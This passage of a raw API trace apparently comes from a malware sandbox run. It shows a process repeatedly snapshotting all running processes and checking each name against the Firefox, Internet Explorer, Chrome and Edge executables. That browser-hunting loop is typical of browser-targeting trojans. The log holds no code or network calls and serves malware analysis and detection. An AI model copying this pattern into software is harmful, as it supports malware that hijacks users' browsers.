(in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.618] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.618] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.618] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.618] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.618] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0187.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0187.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0187.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.618] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0187.619] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0187.619] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0187.619] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0187.619] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0187.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0187.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0187.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0187.620] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0187.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0187.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0187.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0187.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0187.621] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0187.621] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0187.621] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0187.621] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0187.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0187.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0187.622] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0187.622] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0187.622] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0187.622] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0187.622] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0187.622] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0187.623] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0187.623] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0187.623] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0187.623] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0187.623] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0187.623] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0187.623] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0187.623] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0187.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0187.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0187.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0187.624] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0187.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0187.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0187.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0187.625] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.625] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0187.625] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0187.625] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0187.625] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0187.625] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.625] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0187.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0187.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0187.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0187.626] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.626] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0187.626] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0187.626] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0187.626] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0187.627] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0187.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0187.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0187.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0187.627] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.627] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0187.628] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0187.628] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0187.628] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0187.628] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0187.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0187.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0187.629] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0187.629] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0187.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0187.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0187.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0187.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0187.630] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0187.630] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0187.630] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0187.630] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0187.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0187.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0187.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0187.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0187.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0187.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0187.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0187.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0187.632] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0187.632] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0187.632] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0187.632] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0187.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0187.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0187.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.633] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.633] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.633] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.633] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.633] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0187.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0187.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0187.634] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0187.634] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.634] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.634] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.634] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.634] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.635] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0187.635] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0187.635] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0187.635] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.635] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.635] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.635] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.635] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.636] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.636] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.636] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.636] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.636] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.637] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0187.637] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0187.637] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0187.637] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.637] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0187.637] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0187.637] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0187.637] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.638] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.639] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.639] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.639] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.639] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.639] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.639] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.640] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.640] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.640] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.640] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.640] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0187.640] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0187.640] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0187.640] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0187.640] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0187.640] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0187.641] CloseHandle (hObject=0xd4) returned 1 [0187.641] Sleep (dwMilliseconds=0x3e8) [0188.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0188.677] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.678] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0188.678] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0188.678] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0188.678] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0188.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.678] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0188.678] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0188.678] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0188.678] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0188.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.679] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0188.679] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0188.679] lstrcmpiA 